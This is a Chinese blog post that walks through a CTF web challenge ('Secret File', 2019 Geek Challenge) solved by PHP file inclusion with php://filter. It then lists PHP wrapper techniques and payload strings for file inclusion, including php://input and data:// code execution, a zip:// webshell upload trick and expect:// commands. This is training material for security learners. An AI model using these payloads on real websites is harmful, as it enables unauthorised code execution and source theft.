[极客大挑战 2019]Secret File&文件包含常用伪协议以及姿势

最新推荐文章于 2024-05-15 18:21:54 发布
最新推荐文章于 2024-05-15 18:21:54 发布
阅读量603 收藏 3
点赞数
文章标签: php 开发语言 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68074153/article/details/126031202
版权

1.进入页面查看源码

在这里插入图片描述
找到提示有一个Archive_room.php文件,查看
在这里插入图片描述
点进去查看
在这里插入图片描述
回去看Archive_room.php的源码,发现url是action.php但是进来之后重定向导论了end.php。抓包重放查看相应包发现 secr3t.php
在这里插入图片描述
查看出现源码
在这里插入图片描述

2.文件包含

代码审计,这里可以文件包含并且过滤了一些特定字符,但是php没有被过滤。先直接包含flag.php看看。
在这里插入图片描述
存在文件,经典姿势查看源代码:php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
base64解密
在这里插入图片描述
找到flag

文件包含常用协议(姿势)

一、协议:
1.php://filter 读取文件源码 
	php://filter 协议可以对打开的数据流进行筛选和过滤,常用于读取文件源码
	使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,
	可以使用base64对文件内容进行编码,编码后的文件内容不会被执行,而是展示
	在页面中,我们将页面中的内容使用base64解码,就可以获取文件的源码了
2.php://input 任意代码执行
	php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体	
	中的内容当做文件内容执行,从而实现任意代码执行,需要注意的是,当
	enctype=multipart/form-data时,php:/input将会无效
3.data://text/plain 任意代码执行
	协议格式: data:资源类型;编码,内容
	data://协议通过执行资源类型,使后面的内容当做文件内容来执行,从而造成任	
	意代码执行
4.zip:// 配合文件上传开启后门
	ziip://协议用来读取压缩包中的文件,可以配合文件上传开启后门,获取
	webshell将shell.txt压缩成zip,再将后缀名改为jpg上传至服务器,再通过
	zip伪协议访问压缩包里的文件,从而链接木马
二、姿势:
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php
?page=zip://shell.jpg%23payload.php
?page=data://text/plain;base64,[base64_encode_shell]
?page=expect://id
?page=expect://ls
?page=php://input | POST DATA:
SheepLeeeee
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[挑战 2019]Secret File
weixin_46133275的博客
07-07 535
1.打开题目链接,乍一看没有看到可疑的地方,打开开发者工具查看网页源代码,发现网页中有一个<a>标签,目标链接为./,可以看到需要传输一个file参数,并且提示代码放在了flag.php里,尝试提交flag.php给file参数。页面,发现SECRET带下划线(直觉告诉我是超链接),查看源代码,同样是<a>标签,链接地址为./通俗来讲,当我们遇到php文件包含的时候,可以考虑使用php://filter来读取php的代码。7.得到一串base64编码,使用在线解码网站进行解码,解码后就可以看见flag了。
BUUCTF之[挑战 2019]Secret File--------文件包含和密码文件
weixin_44632787的博客
06-13 1000
  BUUCTF之[挑战 2019]Secret File--------文件包含和密码文件 启动我们的项目,看到挑战的页面 右键查看网页的源代码   看到一个可疑的链接,我们访问它:./Archive_room.php。然后出现以下新的页面,我们根据提示访问它看看会出现什么…   啊啊啊???什么?就没别的提示了吗?   不急,我们看看源代码。好吧源代码什么也没有。但是根据上一个页面的提示:**没看清楚?回去再仔细看看吧。**这句话很可疑,是不是提示我们说那里有个重定向,导致页面跳转的太快所
文件包含中的协议
最新发布
My笔记的博客
05-15 706
php.ini 中的两个重要选项 PHP 中几个比较重要的协议:php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
[挑战 2019]Secret File(BUUCTF)
HackerYY的博客
12-30 1065
BUUCTF找秘密水题 内附解题过程
[挑战 2019]Secret File 1(详细版)
qq_61861243的博客
09-25 500
1、首先进入靶机没发现啥有用的信息 ,我查看一下网站的源码看看有没有啥有用的信息,发现了一个Archive_room.php。2、我们点击Archive_room.php进行访问,然后我进入到页面,发现一个有提示secret(秘密)的按钮3、点击一下secret,进入到一个新的页面,。4、根据进入的页面提示,我们想到可能是页面跳的太快,这里我们用bp抓一下包,发现一个secr3t.php5、将secr3t.php 直接加在网站后面,发现了有关flag的信息,一个flag.php文件
BUUCTF Web [挑战 2019]Secret File
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [挑战 2019]Secret File一、题目简介二、思路分析1)信息泄露2)文件包含三、解题步骤1)查看网页源代码2)拦截请求,查看响应信息3)文件包含漏洞4)PHP协议读取文件内容四、总结 一、题目简介 进入链接以后是一个「文字」页面,没有什么特别的功能 二、思路.
secret_file
12-24
攻防世界pwn题,该题虽然最终解题脚本比较简单,但分析过程还是比较中肯的,适合新人一同学习。解题wp链接:https://blog.csdn.net/A951860555/article/details/111601870
【AndroidFile】Mac & Android 文件互传
05-15
Open AndroidFileTransfer.dmg. Drag Android File Transfer to Applications. Use the USB cable that came with your Android device and connect it to your Mac. Double click Android File Transfer. Browse ...
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典摇滚跑活动方案
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
12个游戏玩家和图标集icon_ai&xd素材下载.zip
12-28
12个游戏玩家和图标集icon.ai&xd素材下载 AI、Icon、xd、图标集、游戏图标集
BUUCTF系列 // [挑战 2019] Secret File
qq_45805420的博客
09-25 461
前言 本题知识点:PHP 文件包含漏洞 & 利用网页背景隐藏信息 WP 进入题目页面,乍看没有什么明显的思路,查看网页源代码,发现源码中出现了部分在页面中被隐藏了的信息,这才意识到了出题者的心思 这个小技巧原理并不复杂,主要是在前端中利用网页的背景颜色来覆盖相同颜色的内容,使得相关信息肉眼不可见,初次相遇确实不易 Get 到思路,可以通过全选页面内容的方式,使所有的信息展现出来 点击隐藏信息,题目跳转到了一个新的页面 尝试点击SECRET按钮,网页再次跳转 根据该页面的信息判断,SECRET
【每天学习一点新知识】文件包含常用协议
RexHa的博客
02-06 3585
一些比较常用的php协议用法及部分演示过程
文件包含漏洞相关协议详解
永远是少年
12-13 2389
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
[挑战 2019]Secret File 1解题思路及BurpSuite教程
qq_24594197的博客
04-28 3564
网页跳的快让你看不到怎么办?使用BurpSuite就好了,软件放这里:链接,提取码:kmwc,教程 浏览器代理配置随便放一个:IE,chorme,火狐代理设置,设置完成后打卡burpsuite软件,第一次用这个软件,看来网上很多教程写的很简单,什么抓包,右键 —> Send to Repeater,但是小白的我试了半天才搞懂,特意写下来给那些小白看,到结合这道题讲讲,F12查看源代码 在网址后面加上Archive_room.php,提示看不清? 使用工具BurpSuite,点击下图jar包即可,先看看
Secret File
weixin_46580614的博客
07-16 146
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
挑战2019secret file
03-16
挑战2019的Secret File是一个神秘的文件,里面可能包含了一些重要的信息或者任务。参赛者需要通过各种技能和智慧来解密这个文件,完成挑战。这是一个非常有趣和刺激的比赛,可以锻炼参赛者的思维能力和团队...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值